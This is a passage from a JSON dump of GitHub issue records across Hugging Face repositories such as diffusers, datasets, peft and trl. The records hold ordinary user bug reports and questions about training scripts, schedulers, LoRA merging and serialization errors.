blocks the training loop, even though the thread should be running in the background.\r\n\r\nWhen I switch the code to use `torch.save`, there's no issue. What should I do?", "url": "https://github.com/huggingface/safetensors/issues/541", "state": "open", "labels": [], "created_at": "2024-11-15T00:37:55Z", "updated_at": "2025-02-26T09:51:23Z", "comments": 4, "user": "vedantroy" }, { "repo": "huggingface/peft", "number": 2216, "title": "How to specify the coefficients of loading lora during inference?", "body": "", "url": "https://github.com/huggingface/peft/issues/2216", "state": "closed", "labels": [], "created_at": "2024-11-14T11:47:00Z", "updated_at": "2024-11-18T11:30:03Z", "user": "laolongboy" }, { "repo": "huggingface/chat-ui", "number": 1565, "title": "Is there any place that uses this environment variable?", "body": "https://github.com/huggingface/chat-ui/blob/ab349d0634ec4cf68a781fd7afc5e7fdd6bb362f/.env#L59-L65\r\n\r\nIt seems like it can be deleted.", "url": "https://github.com/huggingface/chat-ui/issues/1565", "state": "closed", "labels": [], "created_at": "2024-11-14T11:12:49Z", "updated_at": "2024-11-14T11:17:04Z", "comments": 2, "user": "calycekr" }, { "repo": "huggingface/diffusers", "number": 9927, "title": "HeaderTooLarge when train controlnet with sdv3", "body": "### Describe the bug\n\nHello, I tried diffuser to train controlnet with sdv3 but it didn't start training and send `safetensors_rust.SafetensorError: Error while deserializing header: HeaderTooLarge` feedback. I don't know how to handle it.\n\n### Reproduction\n\nFollow the README_v3 guide.\n\n### Logs\n\n```shell\n(diffusers) [liudongyu@localhost controlnet]$ accelerate launch train_controlnet_sd3.py --pretrained_model_name_or_path=$MODEL_DIR --output_dir=$OUTPUT_DIR --train_data_dir=\"/home/users/liudongyu/datasets\" --resolution=1024 --learning_rate=1e-5 --max_train_steps=20000 --train_batch_size=1 --gradient_accumulation_steps=4\r\nDetected kernel version 3.10.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.\r\n11/14/2024 15:16:14 - INFO - __main__ - Distributed environment: DistributedType.NO\r\nNum processes: 1\r\nProcess index: 0\r\nLocal process index: 0\r\nDevice: cuda\r\n\r\nMixed precision type: no\r\n\r\nYou set `add_prefix_space`. The tokenizer needs to be converted from the slow tokenizers\r\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\nYou are using a model of type t5 to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\r\n{'max_image_seq_len', 'base_image_seq_len', 'use_dynamic_shifting', 'max_shift', 'base_shift'} was not found in config. Values will be initialized to default values.\r\nTraceback (most recent call last):\r\n File \"/home/users/liudongyu/diffuser/diffusers/examples/controlnet/train_controlnet_sd3.py\", line 1423, in \r\n main(args)\r\n File \"/home/users/liudongyu/diffuser/diffusers/examples/controlnet/train_controlnet_sd3.py\", line 982, in main\r\n text_encoder_one, text_encoder_two, text_encoder_three = load_text_encoders(\r\n ^^^^^^^^^^^^^^^^^^^\r\n File \"/home/users/liudongyu/diffuser/diffusers/examples/controlnet/train_controlnet_sd3.py\", line 187, in load_text_encoders\r\n text_encoder_two = class_two.from_pretrained(\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n File \"/home/users/liudongyu/anaconda3/envs/diffusers/lib/python3.11/site-packages/transformers/modeling_utils.py\", line 3789, in from_pretrained\r\n with safe_open(resolved_archive_file, framework=\"pt\") as f:\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\nsafetensors_rust.SafetensorError: Error while deserializing header: HeaderTooLarge\r\nTraceback (most recent call last):\r\n File \"/home/users/liudongyu/anaconda3/envs/diffusers/bin/accelerate\", line 8, in \r\n sys.exit(main())\r\n ^^^^^^\r\n File \"/home/users/liudongyu/anaconda3/envs/diffusers/lib/python3.11/site-packages/accelerate/commands/accelerate_cli.py\", line 48, in main\r\n args.func(args)\r\n File \"/home/users/liudongyu/anaconda3/envs/diffusers/lib/python3.11/site-packages/accelerate/commands/launch.py\", line 1168, in launch_command\r\n simple_launcher(args)\r\n File \"/home/users/liudongyu/anaconda3/envs/diffusers/lib/python3.11/site-packages/accelerate/commands/launch.py\", line 763, in simple_launcher\r\n raise subprocess.CalledProcessError(returncode=process.returncode, cmd=cmd)\r\nsubprocess.CalledProcessError: Command '['/home/users/liudongyu/anaconda3/envs/diffusers/bin/python', 'train_controlnet_sd3.py', '--pretrained_model_name_or_path=stabilityai/stable-diffusion-3-medium-diffusers', '--output_dir=sd3-controlnet-out', '--train_data_dir=/home/users/liudongyu/datasets', '--resolution=1024', '--learning_rate=1e-5', '--max_train_steps=20000', '--train_batch_size=1', '--gradient_accumulation_steps=4']' returned non-zero exit status 1.\n```\n\n\n### System Info\n\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\r\n\r\n- \ud83e\udd17 Diffusers version: 0.31.0.dev0\r\n- Platform: Linux-3.10.0-1160.114.2.el7.x86_64-x86_64-with-glibc2.17\r\n- Running on Google Colab?: No\r\n- Python version: 3.11.10\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.25.2\r\n- Transformers version: 4.45.2\r\n- Accelerate version: 1.0.0\r\n- PEFT version: not installed\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\r\n- Accelerator: NVIDIA A100-PCIE-40GB, 40960 MiB\r\nNVIDIA A100 80GB PCIe, 81920 MiB\r\n- Using GPU in script?: yes\r\n- Using distributed or parallel set-up in script?: no\r\n\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9927", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-14T07:28:03Z", "updated_at": "2024-11-21T13:02:05Z", "comments": 3, "user": "Viola-Siemens" }, { "repo": "huggingface/datasets", "number": 7290, "title": "`Dataset.save_to_disk` hangs when using num_proc > 1", "body": "### Describe the bug\n\nHi, I'm encountered a small issue when saving datasets that led to the saving taking up to multiple hours.\r\nSpecifically, [`Dataset.save_to_disk`](https://huggingface.co/docs/datasets/main/en/package_reference/main_classes#datasets.Dataset.save_to_disk) is a lot slower when using `num_proc>1` than when using `num_proc=1`\r\n\r\nThe documentation mentions that \"Multiprocessing is disabled by default.\", but there is no explanation on how to enable it.\n\n### Steps to reproduce the bug\n\n```\r\nimport numpy as np\r\nfrom datasets import Dataset\r\n\r\nn_samples = int(4e6)\r\nn_tokens_sample = 100\r\ndata_dict = {\r\n 'tokens' : np.random.randint(0, 100, (n_samples, n_tokens_sample)),\r\n}\r\n\r\ndataset = Dataset.from_dict(data_dict)\r\ndataset.save_to_disk('test_dataset', num_proc=1)\r\ndataset.save_to_disk('test_dataset', num_proc=4)\r\ndataset.save_to_disk('test_dataset', num_proc=8)\r\n```\r\n\r\nThis results in:\r\n```\r\n>>> dataset.save_to_disk('test_dataset', num_proc=1)\r\nSaving the dataset (7/7 shards): 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 4000000/4000000 [00:17<00:00, 228075.15 examples/s]\r\n>>> dataset.save_to_disk('test_dataset', num_proc=4)\r\nSaving the dataset (7/7 shards): 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 4000000/4000000 [01:49<00:00, 36583.75 examples/s]\r\n>>> dataset.save_to_disk('test_dataset', num_proc=8)\r\nSaving the dataset (8/8 shards): 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 4000000/4000000 [02:11<00:00, 30518.43 examples/s]\r\n```\r\n\r\nWith larger datasets it can take hours, but I didn't benchmark that for this bug report.\n\n### Expected behavior\n\nI would expect using `num_proc>1` to be faster instead of slower than `num_proc=1`. \n\n### Environment info\n\n- `datasets` version: 3.1.0\r\n- Platform: Linux-5.15.153.1-microsoft-standard-WSL2-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- `huggingface_hub` version: 0.26.2\r\n- PyArrow version: 18.0.0\r\n- Pandas version: 2.2.3\r\n- `fsspec` version: 2024.6.1", "url": "https://github.com/huggingface/datasets/issues/7290", "state": "open", "labels": [], "created_at": "2024-11-14T05:25:13Z", "updated_at": "2025-11-24T09:43:03Z", "comments": 4, "user": "JohannesAck" }, { "repo": "huggingface/trl", "number": 2356, "title": "How to train from scratch? Can you provide the code", "body": "### System Info\n\n train from scratch\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n train from scratch\n\n### Expected behavior\n\n train from scratch\n\n### Checklist\n\n- [X] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [X] I have included my system information\n- [X] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [X] Any code provided is properly formatted in code blocks, (no screenshot, [more on code blocks](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [X] Any traceback provided is complete", "url": "https://github.com/huggingface/trl/issues/2356", "state": "closed", "labels": [ "\u2753 question" ], "created_at": "2024-11-14T02:39:41Z", "updated_at": "2024-12-13T23:00:20Z", "user": "sankexin" }, { "repo": "huggingface/sentence-transformers", "number": 3054, "title": "'scale' hyperparameter in MultipleNegativesRankingLoss", "body": "I am looking through the MultipleNegativesRankingLoss.py code and I have question about the 'scale' hyperparameter. Also known as the 'temperature', the scale is used to stretch or compress the range of output values from the similarity function. A larger scale creates greater distinction between positive and negative examples in terms of similarity score differences. The line below is how the scale is used in the forward function of the loss. \r\n\r\n`scores = self.similarity_fct(embeddings_a, embeddings_b) * self.scale`\r\n\r\nCurrently, the scale is set to 20 for when cosine similarity is used as the distance metric. \r\n\r\nWhy was 20 selected as the scale for when using cosine similarity on the embeddings? Is this the optimal scale value for cosine similarity? Would this hyperparameter need to be optimized during fine-tuning? ", "url": "https://github.com/huggingface/sentence-transformers/issues/3054", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-14T00:11:23Z", "updated_at": "2025-01-16T13:54:45Z", "user": "gnatesan" }, { "repo": "huggingface/diffusers", "number": 9924, "title": "Can we get more schedulers for flow based models such as SD3, SD3.5, and flux", "body": "It seems advanced schedulers such as DDIM, and the dpm++ 2m does work with flow based model such as SD3, SD3.5, and flux. \r\nHowever, I only see 2 flow based schedulers in diffusers codebase:\r\n\r\nFlowMatchEulerDiscreteScheduler, and'\r\nFlowMatchHeunDiscreteScheduler\r\n\r\nI tried to use DPMSolverMultistepScheduler, but it does not generate correct images with flow based models. Help?\r\n", "url": "https://github.com/huggingface/diffusers/issues/9924", "state": "open", "labels": [ "wip", "scheduler" ], "created_at": "2024-11-14T00:07:56Z", "updated_at": "2025-01-14T18:31:12Z", "comments": 40, "user": "linjiapro" }, { "repo": "huggingface/pytorch-image-models", "number": 2332, "title": "[BUG] How to customize the number of classification heads", "body": "**Describe the bug**\r\n\r\n\r\n**To Reproduce**\r\nSteps to reproduce the behavior:\r\nfrom timm.models import create_model\r\ncheckpoint_path = \"/nas_mm_2/yinxiaofei.yxf/open_source_model/InternViT-300M-448px/tmp/timm__vit_intern300m_patch14_448.ogvl_dist/model.safetensors\"\r\nmodel = create_model('vit_intern300m_patch14_448',checkpoint_path=checkpoint_path, num_classes = 3)\r\n\r\n\r\n**Screenshots**\r\nRuntimeError: Error(s) in loading state_dict for VisionTransformer:\r\nMissing key(s) in state_dict: \"head.weight\", \"head.bias\". \r\n\r\n\r\n**Additional context**\r\nIf I remove the num_classes = 3 parameter, then this program is completely normal\r\n", "url": "https://github.com/huggingface/pytorch-image-models/issues/2332", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-12T08:08:50Z", "updated_at": "2024-11-12T15:28:42Z", "user": "JarvisFei" }, { "repo": "huggingface/unity-api", "number": 30, "title": "[QUESTION]", "body": "I have a simple game built in unity and I'm using this Hugging face API client for voice parsing. I'm trying to understand when I build and run the game, and want to distribute it to many users, how do I keep the same api key every time so that users can install and run voice control it without any issue?", "url": "https://github.com/huggingface/unity-api/issues/30", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-12T02:35:52Z", "updated_at": "2024-11-20T01:46:16Z", "user": "harshal-14" }, { "repo": "huggingface/swift-transformers", "number": 140, "title": "How to use customized tokenizer?", "body": "Hello. I am writing this post because I have a question about loading the tokenizer model. I am trying to use a pre-trained tokenizer in a Swift environment. After training, how do I apply the byproduct .model and .vocab files so that I can use the tokenizer I trained in Swift while using the swift-transformer API? I would appreciate it if you could answer.", "url": "https://github.com/huggingface/swift-transformers/issues/140", "state": "open", "labels": [ "tokenization" ], "created_at": "2024-11-11T09:36:14Z", "updated_at": "2025-09-10T13:19:10Z", "user": "cch1219" }, { "repo": "huggingface/diffusers", "number": 9900, "title": "Potential bug in repaint?", "body": "https://github.com/huggingface/diffusers/blob/dac623b59f52c58383a39207d5147aa34e0047cd/src/diffusers/schedulers/scheduling_repaint.py#L322\r\n\r\nAccording to line5 of algorithm 1 in the paper, the second part in line 322 should remove the `**0.5`?\r\nthanks!", "url": "https://github.com/huggingface/diffusers/issues/9900", "state": "closed", "labels": [], "created_at": "2024-11-10T10:41:26Z", "updated_at": "2024-12-16T19:38:22Z", "comments": 3, "user": "jingweiz" }, { "repo": "huggingface/finetrainers", "number": 82, "title": "[question] what is the difference between cofgvideo scheduler and normal diffuers scheduler", "body": "### Feature request / \u529f\u80fd\u5efa\u8bae\n\nCogVideoXDPMScheduler VS DPMSCheduler\r\nCogVideoXDDIMScheduler VS DDIM Scheduler\r\nHi Aryan, is there any sampling difference between these two sampler? \r\n@a-r-r-o-w \n\n### Motivation / \u52a8\u673a\n\n/\n\n### Your contribution / \u60a8\u7684\u8d21\u732e\n\n/", "url": "https://github.com/huggingface/finetrainers/issues/82", "state": "closed", "labels": [], "created_at": "2024-11-09T17:15:57Z", "updated_at": "2024-12-19T14:43:23Z", "user": "foreverpiano" }, { "repo": "huggingface/optimum", "number": 2092, "title": "Add support for RemBERT in the ONNX export", "body": "### Feature request\n\nAdd RemBERT to supported architectures for ONNX export.\n\n### Motivation\n\nThe support for [RemBert](https://huggingface.co/docs/transformers/model_doc/rembert) was previously available in Transformers see [here](https://github.com/huggingface/transformers/issues/16308). However, now it seems that RemBERT is no longer supported.\n\n### Your contribution\n\nI can help by testing implementation or providing the code if provided by some tutorial. I was not able to find documentation on how to do that.", "url": "https://github.com/huggingface/optimum/issues/2092", "state": "closed", "labels": [ "onnx" ], "created_at": "2024-11-08T15:12:34Z", "updated_at": "2024-12-02T13:54:10Z", "comments": 1, "user": "mlynatom" }, { "repo": "huggingface/lerobot", "number": 502, "title": "Low accuracy for diffusion policy+aloha env+sim_transfer_cude_human dataset", "body": "I'm trying to use diffusion model and aloha env to train on sim_transfer_cude_human dataset. But after 60000 training step, the evaluation accuracy is only 2%-6%. Idont know why? If I load pre-trained act policy, the accuracy can reach 80%.", "url": "https://github.com/huggingface/lerobot/issues/502", "state": "open", "labels": [ "question", "simulation" ], "created_at": "2024-11-08T02:20:14Z", "updated_at": "2025-11-29T02:48:27Z", "user": "Kimho666" }, { "repo": "huggingface/local-gemma", "number": 41, "title": "How to load from file?", "body": "How to load model from file, eg. .h5 file, instead of downloading the model?\r\nEspecially the model saved by keras_nlp.", "url": "https://github.com/huggingface/local-gemma/issues/41", "state": "open", "labels": [], "created_at": "2024-11-07T03:01:25Z", "updated_at": "2024-11-07T03:03:31Z", "user": "datdq-abivin" }, { "repo": "huggingface/diffusers", "number": 9876, "title": "Why isn\u2019t VRAM being released after training LoRA?", "body": "### Describe the bug\n\nWhen I use train_dreambooth_lora_sdxl.py, the VRAM is not released after training. How can I fix this?\n\n### Reproduction\n\nNot used.\n\n### Logs\n\n_No response_\n\n### System Info\n\n\r\n- \ud83e\udd17 Diffusers version: 0.31.0.dev0\r\n- Platform: Linux-5.14.0-284.25.1.el9_2.x86_64-x86_64-with-glibc2.17\r\n- Running on Google Colab?: No\r\n- Python version: 3.8.20\r\n- PyTorch version (GPU?): 2.2.0 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.25.2\r\n- Transformers version: 4.45.2\r\n- Accelerate version: 1.0.1\r\n- PEFT version: 0.13.2\r\n- Bitsandbytes version: 0.44.1\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\r\n- Accelerator: NVIDIA H800, 81559 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9876", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-11-06T11:58:59Z", "updated_at": "2024-12-13T15:03:25Z", "comments": 14, "user": "hjw-0909" }, { "repo": "huggingface/diffusers", "number": 9866, "title": "Flux controlnet can't be trained, do this script really work?", "body": "### Describe the bug\n\nrun with one num processes, the code broke down and returns:\r\nRuntimeError: Expected to have finished reduction in the prior iteration before starting a new one. This error indicates that your module has parameters that were not used in producing loss. You can enable unused parameter detection by passing the keyword argument `find_unused_parameters=True` to `torch.nn.parallel.DistributedDataParallel`, and by \r\n\r\nrun with more than one processes, the code broke down and returns:\r\nSome NCCL operations have failed or timed out. Due to the asynchronous nature of CUDA kernels, subsequent GPU operations might run on corrupted/incomplete data.\n\n### Reproduction\n\njust follow the instructions and it will be reproduced\n\n### Logs\n\n_No response_\n\n### System Info\n\ndiffusers v0.32\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9866", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-11-05T08:51:57Z", "updated_at": "2024-12-05T15:19:12Z", "comments": 4, "user": "liuyu19970607" }, { "repo": "huggingface/optimum-quanto", "number": 346, "title": "How to support activation 4bit quantization?", "body": "As mentioned in title.", "url": "https://github.com/huggingface/optimum-quanto/issues/346", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-11-04T09:59:21Z", "updated_at": "2024-12-10T02:10:31Z", "user": "Ther-nullptr" }, { "repo": "huggingface/transformers", "number": 34591, "title": "How to retrain the GLIP model on the Object365 dataset", "body": "Since I made some modifications to the GLIP model, I need to perform some pre-training again to improve performance. I replaced `_base_ = [../_base_/datasets/coco_detection.py]` with `_base_ = [../_base_/datasets/objects365v1_detection.py]` in `glip_atss_swin-t_a_fpn_dyhead_16xb2_ms-2x_funtune_coco.py` to train on Object365. Is this correct?", "url": "https://github.com/huggingface/transformers/issues/34591", "state": "closed", "labels": [], "created_at": "2024-11-04T03:54:17Z", "updated_at": "2024-11-04T06:46:17Z", "user": "Polarisamoon" }, { "repo": "huggingface/diffusers", "number": 9847, "title": "Merge Lora weights into base model", "body": "I have finetuned the stable diffusion model and would like to merge the lora weights into the model itself. Currently I think in PEFT this is supported using `merge_and_unload` function but I seem to not find this option in diffusers. So is there any way to get a base model but with finetuned weights and If i am not wrong only unet part of model weights needs to be merged.\r\n\r\nThis is necessary for the tasks like feature extraction. ", "url": "https://github.com/huggingface/diffusers/issues/9847", "state": "closed", "labels": [], "created_at": "2024-11-02T18:00:28Z", "updated_at": "2024-11-03T03:03:45Z", "comments": 1, "user": "yaswanth19" }, { "repo": "huggingface/chat-ui", "number": 1550, "title": "Add full-text search in chat history", "body": "## Describe your feature request\r\n\r\nAllow users to search for specific keywords or phrases within the chat history, making it easier to find and recall previous conversations.\r\n\r\n## Screenshots (if relevant)\r\n\r\nAn example of the search bar placement could be found in #1079\r\n\r\n## Implementation idea\r\n\r\nOne possible implementation could be to use a library to index the chat history data. This would allow for efficient and scalable search functionality. The search bar could be added to the chat history interface, and when a user enters a search query, it would send a request to the search index to retrieve relevant results. The results could be displayed in a dropdown list or a separate search results page, with links to the original chat messages.\r\n\r\n## Previous proposals and why this one is different\r\n\r\nI'm aware that a similar proposal was made in the past #243, but it was rejected in favor of using the browser's page search functionality (ctrl + F). However, I'd like to argue that page search does not provide the same functionality as a dedicated full-text search in chat history. Here's why:\r\n\r\n- Page search is limited to the currently loaded chat history and previous chat names, whereas a dedicated search would allow users to search across the entire conversation history, even if it's not currently loaded on the page.\r\n- Page search does not provide any contextual information, such as the date and time of the message, or the conversation, whereas a dedicated search could provide this information and make it easier for users to understand the context of the search results.\r\n\r\nGiven these differences, I believe that a dedicated full-text search in chat history is a valuable feature that would greatly improve the user experience, and I'd like to propose it again for consideration.\r\n\r\nPersonally, I tend to create a new chat for each small problem to keep the LLM focused on what's important. As a result, I end up with too many chats with similar names, which makes the browser page search nearly useless.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1550", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-11-01T19:27:41Z", "updated_at": "2025-05-28T15:03:19Z", "comments": 5, "user": "kadykov" }, { "repo": "huggingface/diffusers", "number": 9837, "title": "[Feature] Is it possible to customize latents.shape / prepare_latent for context parallel case?", "body": "**Is your feature request related to a problem? Please describe.**\r\nOne may need to extend the code to context parallel case and the latent sequence length needs to get divided.\r\nInstead of copying all the code of pipeline.py, the minimum modification is just adding few lines about dividing the latent shape and all_gather the result from the output.\r\nI suggest adding this feature so doing the monkey patch will be easier.\r\n", "url": "https://github.com/huggingface/diffusers/issues/9837", "state": "closed", "labels": [ "stale" ], "created_at": "2024-11-01T14:32:05Z", "updated_at": "2024-12-01T15:07:36Z", "comments": 3, "user": "foreverpiano" }, { "repo": "huggingface/diffusers", "number": 9836, "title": "[Feature] Can we record layer_id for DiT model?", "body": "**Is your feature request related to a problem? Please describe.**\r\nSome layerwise algorithm may be based on layer-id.\r\njust need some simple modification for transformer2Dmodel and its inner module like attention part, batch_norm part. just pass the layer_id as an extra parameter.\r\n", "url": "https://github.com/huggingface/diffusers/issues/9836", "state": "closed", "labels": [ "stale" ], "created_at": "2024-11-01T14:26:31Z", "updated_at": "2025-01-27T01:31:21Z", "comments": 9, "user": "foreverpiano" }, { "repo": "huggingface/diffusers", "number": 9835, "title": "unused parameters lead to error when training contrlnet_sd3", "body": "### Discussed in https://github.com/huggingface/diffusers/discussions/9834\r\n\r\n
\r\n\r\nOriginally posted by **Zheng-Fang-CH** November 1, 2024\r\n![b1fa13bdb595284dce31e3cf189876b](https://github.com/user-attachments/assets/12faa0fc-acb8-4c98-ba03-b0e41bc9075a)\r\nIs there someone meet this question? I have this error no matter I train it on single gpu or multi gpu.
", "url": "https://github.com/huggingface/diffusers/issues/9835", "state": "closed", "labels": [], "created_at": "2024-11-01T13:57:03Z", "updated_at": "2024-11-17T07:33:25Z", "comments": 6, "user": "Daryu-Fan" }, { "repo": "huggingface/diffusers", "number": 9833, "title": "SD3.5-large. Why is it OK when calling with a single thread, but not with multiple threads?", "body": "### Describe the bug\r\n\r\nFirst, I created a SD3.5-large service:\r\n\r\n```python\r\nimport os\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\r\nimport uuid\r\nfrom diffusers import BitsAndBytesConfig, SD3Transformer2DModel, DDIMScheduler, DDPMParallelScheduler\r\nfrom diffusers import StableDiffusion3Pipeline\r\nimport torch\r\nfrom transformers import T5EncoderModel\r\nimport time \r\nfrom flask import request, jsonify\r\nimport logging\r\nimport sys\r\nimport flask\r\n\r\napp = flask.Flask(\"sd_server\")\r\n\r\nhandler = logging.StreamHandler(sys.stdout)\r\nhandler.setFormatter(logging.Formatter(\"[%(asctime)s] %(levelname)s in %(module)s: %(message)s\"))\r\napp.logger.handlers.clear()\r\napp.logger.addHandler(handler)\r\napp.logger.setLevel(logging.INFO)\r\n\r\n# model pipeline\r\nmodel_id = \"../stable-diffusion-3.5-large\"\r\n\r\nnf4_config = BitsAndBytesConfig(\r\n load_in_4bit=True,\r\n bnb_4bit_quant_type=\"nf4\",\r\n bnb_4bit_compute_dtype=torch.bfloat16\r\n)\r\nmodel_nf4 = SD3Transformer2DModel.from_pretrained(\r\n model_id,\r\n subfolder=\"transformer\",\r\n quantization_config=nf4_config,\r\n torch_dtype=torch.bfloat16\r\n)\r\nmodel_nf4 = model_nf4.to(\"cuda:0\")\r\npipeline = StableDiffusion3Pipeline.from_pretrained(\r\n model_id, \r\n transformer=model_nf4,\r\n torch_dtype=torch.bfloat16\r\n)\r\n# pipeline.scheduler = DDIMScheduler.from_config(pipeline.scheduler.config)\r\n# pipeline.scheduler = DDPMParallelScheduler.from_config(pipeline.scheduler.config)\r\npipeline = pipeline.to(\"cuda:0\")\r\n\r\n# # diffusers/t5-nf4\r\n# t5_nf4 = T5EncoderModel.from_pretrained(\"text_encoder_3\", torch_dtype=torch.bfloat16)\r\n# t5_nf4 = t5_nf4.to(\"cuda:0\")\r\n\r\n# pipeline = StableDiffusion3Pipeline.from_pretrained(\r\n# model_id, \r\n# transformer=model_nf4,\r\n# text_encoder_3=t5_nf4,\r\n# torch_dtype=torch.bfloat16\r\n# )\r\n# pipeline = pipeline.to(\"cuda:0\")\r\n\r\n\r\ndef generate_uuid_filename(extension=\".jpeg\"):\r\n filename = f\"{uuid.uuid4()}{extension}\"\r\n \r\n return filename\r\n\r\ndef image_generation(prompt, negative_prompt, width, height, save_path, num_inference_steps=28, guidance_scale=4.5, max_sequence_length=512):\r\n image = pipeline(\r\n prompt=prompt,\r\n negative_prompt=negative_prompt,\r\n num_inference_steps=num_inference_steps,\r\n width=width,\r\n height=height,\r\n guidance_scale=guidance_scale,\r\n max_sequence_length=max_sequence_length,\r\n ).images[0]\r\n file_name = generate_uuid_filename()\r\n image.save(os.path.join(save_path, file_name))\r\n torch.cuda.empty_cache()\r\n return f\"{file_name}\u4fdd\u5b58\u5b8c\u6bd5...\"\r\n \r\n\r\ndef update_prompt(req_data):\r\n trans = {\"natural\":[\"cinematic photo ```%s``` \uff0c photograph, film, bokeh, professional, 4k, highly detailed\",\r\n \"drawing, painting, crayon, sketch, graphite, impressionist, noisy, blurry, soft, deformed, ugly\"],\r\n \"vivid\":[\"HDR photo of ``%s``` . High dynamic range, vivid, rich details, clear shadows and highlights, realistic, intense, enhanced contrast, highly detailed\",\r\n \"flat, low contrast, oversaturated, underexposed, overexposed, blurred, noisy\"]}\r\n style = \"natural\"\r\n try:\r\n if req_data.get('style') != None:\r\n if req_data.get('style') in trans.keys():\r\n style = req_data.get('style')\r\n except:\r\n pass\r\n import re\r\n try:\r\n req_data[\"promptEnglish\"] = re.findall(r'\\\\\"(.+)\\\\\"',req_data[\"promptEnglish\"])[0]\r\n except:\r\n pass\r\n prompt = trans[style][0]%req_data[\"promptEnglish\"]\r\n negative_prompt = trans[style][1]\r\n if req_data[\"negativePromptEnglish\"] not in [None ,'']:\r\n negative_prompt = req_data[\"negativePromptEnglish\"]\r\n \r\n return prompt, negative_prompt\r\n\r\n@app.route('/api/text_to_img', methods=['POST'])\r\ndef route():\r\n res = {\"id\": \"\",\r\n \"object\": \"image\",\r\n \"created\":int(time.time()),\r\n \"data\":[]}\r\n \r\n req_data = request.json\r\n app.logger.info(req_data)\r\n\r\n prompt, negative_prompt = update_prompt(req_data)\r\n app.logger.info(prompt+\"|\"+negative_prompt)\r\n\r\n width = int(req_data[\"size\"].split(\"x\")[0]) \r\n height= int(req_data[\"size\"].split(\"x\")[1]) \r\n\r\n res[\"data\"] = image_generation(prompt, negative_prompt, width, height, './')\r\n \r\n return jsonify(res)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0',port=12571,threaded=True, debug=False)\r\n```\r\n\r\nThen I called this service concurrently and the following problems occurred\uff1a\r\n\r\n```bash\r\n [2024-11-01 07:32:12,370] INFO in app: {'prompt': '', 'promptEnglish': 'A capybara holding a sign that reads Hello Fast World', 'negative_prompt': '', 'negativePromptEnglish': None, 'style': 'natural', 'size': '1024x1024'}\r\n[2024-11-01 07:32:12,371] INFO in app: cinematic photo ```A capybara holding a sign that reads Hello Fast World``` \uff0c photograph, film, bokeh, professional, 4k, highly detailed|drawing, painting, crayon, sketch, graphite, impressionist, noisy, blurry, soft, deformed, ugly\r\n 4%|\u2588\u2588\u2588\u258b ", "url": "https://github.com/huggingface/diffusers/issues/9833", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-01T08:00:04Z", "updated_at": "2024-11-02T02:14:50Z", "comments": 1, "user": "EvanSong77" }, { "repo": "huggingface/diffusers", "number": 9825, "title": "Support IPAdapters for FLUX pipelines", "body": "### Model/Pipeline/Scheduler description\n\nIPAdapter for FLUX is available now, do you have any plans to add IPAdapter to FLUX pipelines?\n\n### Open source status\n\n- [X] The model implementation is available.\n- [X] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nmodel implementation:\r\n* https://github.com/XLabs-AI/x-flux/blob/main/src/flux/xflux_pipeline.py#L55\r\n\r\nmodel weights:\r\n* https://huggingface.co/XLabs-AI/flux-ip-adapter-v2\r\n* https://huggingface.co/XLabs-AI/flux-ip-adapter\r\n", "url": "https://github.com/huggingface/diffusers/issues/9825", "state": "closed", "labels": [ "help wanted", "wip", "contributions-welcome", "IPAdapter" ], "created_at": "2024-10-31T23:07:32Z", "updated_at": "2024-12-21T17:49:59Z", "comments": 10, "user": "chenxiao111222" }, { "repo": "huggingface/diffusers", "number": 9822, "title": "Loading SDXL loras into Flux", "body": "### Describe the bug\n\nCurrently it's possible to load SDXL loras without warning into Flux.\n\n### Reproduction\n\nIs it possible for you to implement a raise a warning (and an error when a boolean is active) when the list of layers here is 